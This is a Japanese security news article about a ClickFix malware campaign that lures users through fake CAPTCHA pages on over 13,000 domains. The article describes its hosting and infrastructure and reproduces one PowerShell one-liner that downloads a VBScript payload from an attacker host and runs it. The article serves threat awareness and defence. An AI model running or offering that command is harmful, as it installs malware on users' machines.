Hackers Registered 13,000+ Unique Domains and Leverages Cloudflare to Launch Clickfix Attacks
2025/10/15 CyberSecurityNews — 2025年7月に Lab539 の研究者たちが観測したのは、ClickFix と呼ばれるマルウェア・キャンペーンの予想外の急増だった。このブラウザ・ベースの脅威は、13,000 以上の悪意のドメインへとユーザーを誘導し、そのデバイス上で悪意のコマンドを実行させるものであり、影響の範囲を急速に拡大していった。この攻撃は、侵害したインフラや低コストのホスティングを悪用し、無害に見える Web プロンプトを介してペイロードを配信するものだ。
これらの悪意のサイトにアクセスしたユーザーは、CAPTCHA への入力を促され、その後に、クリップボード API 経由でコマンドを実行するように指示される。それにより、攻撃者は任意のスクリプトや実行ファイルを展開できるようになる。
当初、ClickFix ドメインの量は、膨大な攻撃活動の割に目立たないものだった。しかし、8月中旬の時点では、複数の脅威インテリジェンス・プラットフォーム上で顕著な急増が観測され、警戒が高まった。
Lab539 のアナリストたちが指摘するのは、”検証” の手順を装いながらマルウェアをロードする、フロントエンド・サイトの急増である。それが ClickFix の特徴であり、従来からのフィッシング攻撃や水飲み場型攻撃と一線を画す。
ドメイン登録の規模から推測されるのは、従量課金制レジストラ・サービスや再販ホスティングを悪用する、自動プロビジョニング・パイプラインの可能性であり、高度な APT 脅威アクターが好む手動の設定ではない。
ホスティング・プロバイダーの中で多くの割合を占めるのは Cloudflare であり、観測された ClickFix ドメインの約 24% に達するという。このキャンペーンでは、約 500社のプロバイダーがロングテールで悪用されており、単純なブロックリストを回避するための多様なインフラの戦略的な活用が示唆される。
地理的には、米国/ドイツ/インドネシア/ブラジルなどの VPS サービスが目立っている。それが示すのは、世界的な規模でのサードパーティ・サーバへの侵害である。
多くのケースにおいて、この攻撃者は、古くなったサブドメインや、ミスコンフィグのあるサブドメインを悪用し、正規の DNS レコードと悪意のトラフィックを混在させている。
.webp)
感染メカニズムとペイロード配信
感染メカニズムの核となるのは、ユーザーに悟られずに進む、ブラウザのクリップボード API を介したコマンドの書き込みと、ターミナルでの実行である。
この CAPTCHA が終了すると、悪意のサイトから以下のような PowerShell コマンド・シーケンスがクリップボードに書き込まれる。この1行だけで、ユーザーの操作を介すことなく、VBScript ペイロードのダウンロードと実行が完了する。
cmd /c start /min powershell -Command curl.exe -s https://cf-unstable.mediacaptcha.txt -o $env:TEMP\captcha.vbs; Start-Process $env:TEMP\captcha.vbs
このキャンペーンが示唆するのは、エクスプロイト・チェーンよりもソーシャル・エンジニアリングを重視する戦術である。
実行ファイルの直接ダウンロードや難読化されたスクリプトなどの複数のバリエーションが示すのは、ClickFix フレームワークを利用する多数の攻撃者の存在である。
自動化されたドメイン登録やグローバル・ホスティング資産と組み合わせるという、このメカニズムの普遍性が浮き彫りにするのは、最小限のスキルを持つ攻撃者であっても、大規模な侵入の機会を生み出せる可能性である。
ClickFix の急拡大は、巧妙なインフラと運用が重なった結果のようです。自動プロビジョニングや低コスト/再販ホスティングの悪用、放置されたサブドメイン、さらにブラウザのクリップボードを利用したソーシャル・エンジニアリングが組み合わさり、検出を難しくしています。それに加えて、多数のプロバイダに分散しているインフラにより、単純なブロックでは対処が難しく、低スキルの攻撃者であっても攻撃が可能だと、この記事は指摘しています。よろしければ、ClickFix で検索も、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.